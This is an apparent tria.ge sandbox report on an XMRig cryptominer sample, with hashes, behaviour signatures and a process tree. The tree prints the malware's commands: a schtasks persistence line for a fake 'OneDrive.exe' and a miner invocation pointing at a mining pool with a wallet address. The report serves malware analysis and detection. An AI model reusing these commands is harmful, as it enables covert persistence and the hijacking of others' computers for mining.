Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    207s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    07/01/2024, 22:28

General

  • Target

    cf51c50c01a1f91fd1dfbb0a4742ff9aad69417f0a7a95be0bb64d855b0dd5d9.exe

  • Size

    4.2MB

  • MD5

    d6af79c29645eab72cbe21a3a5a118db

  • SHA1

    280950ed79e57afd2f6e1d6dd677ade37ca9d75a

  • SHA256

    cf51c50c01a1f91fd1dfbb0a4742ff9aad69417f0a7a95be0bb64d855b0dd5d9

  • SHA512

    7c9e801a5385e499882f46ec3bff42fcddb1926819781ce1f8120637bf7da444b0f4b4188650b12282cb24f39c30b02a5bbfd8a1566906cd05a14768a1d7b413

  • SSDEEP

    98304:y1W9Kp+CladnYS2dru3SkG/Mul2rq/aReDkizMeQU90:yuKp+VfvQ/Mul2rVe4iwVU90

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf51c50c01a1f91fd1dfbb0a4742ff9aad69417f0a7a95be0bb64d855b0dd5d9.exe
    "C:\Users\Admin\AppData\Local\Temp\cf51c50c01a1f91fd1dfbb0a4742ff9aad69417f0a7a95be0bb64d855b0dd5d9.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp6D05.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
            5⤵
            • Creates scheduled task(s)
            PID:1244
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2808
  • C:\Windows\system32\timeout.exe
    timeout 3
    1⤵
    • Delays execution with timeout.exe
    PID:2812
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {3DF52016-5F3C-4A97-B509-A549F75F3770} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
      C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1444
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        3⤵
          PID:2192
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
            4⤵
            • Creates scheduled task(s)
            PID:2160

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1444-54-0x0000000000670000-0x00000000006F0000-memory.dmp

      Filesize

      512KB

    • memory/1444-49-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

      Filesize

      9.9MB

    • memory/1444-50-0x000000013F040000-0x000000013F668000-memory.dmp

      Filesize

      6.2MB

    • memory/1444-52-0x0000000000670000-0x00000000006F0000-memory.dmp

      Filesize

      512KB

    • memory/1444-53-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2188-14-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2188-3-0x0000000000850000-0x00000000008D0000-memory.dmp

      Filesize

      512KB

    • memory/2188-0-0x000000013FED0000-0x00000001404F8000-memory.dmp

      Filesize

      6.2MB

    • memory/2188-2-0x0000000000840000-0x0000000000841000-memory.dmp

      Filesize

      4KB

    • memory/2188-1-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

      Filesize

      9.9MB

    • memory/2696-20-0x000000013F600000-0x000000013FC28000-memory.dmp

      Filesize

      6.2MB

    • memory/2696-22-0x0000000002500000-0x0000000002580000-memory.dmp

      Filesize

      512KB

    • memory/2696-19-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

      Filesize

      9.9MB

    • memory/2696-30-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

      Filesize

      9.9MB

    • memory/2808-35-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-42-0x0000000001CD0000-0x0000000001CF0000-memory.dmp

      Filesize

      128KB

    • memory/2808-32-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-28-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-33-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-37-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-38-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-39-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-36-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-25-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-40-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-34-0x00000000001F0000-0x0000000000210000-memory.dmp

      Filesize

      128KB

    • memory/2808-43-0x0000000001D70000-0x0000000001D90000-memory.dmp

      Filesize

      128KB

    • memory/2808-41-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-44-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-45-0x0000000001CD0000-0x0000000001CF0000-memory.dmp

      Filesize

      128KB

    • memory/2808-46-0x0000000001D70000-0x0000000001D90000-memory.dmp

      Filesize

      128KB

    • memory/2808-31-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-29-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-26-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2808-24-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB

    • memory/2808-23-0x0000000140000000-0x00000001407DC000-memory.dmp

      Filesize

      7.9MB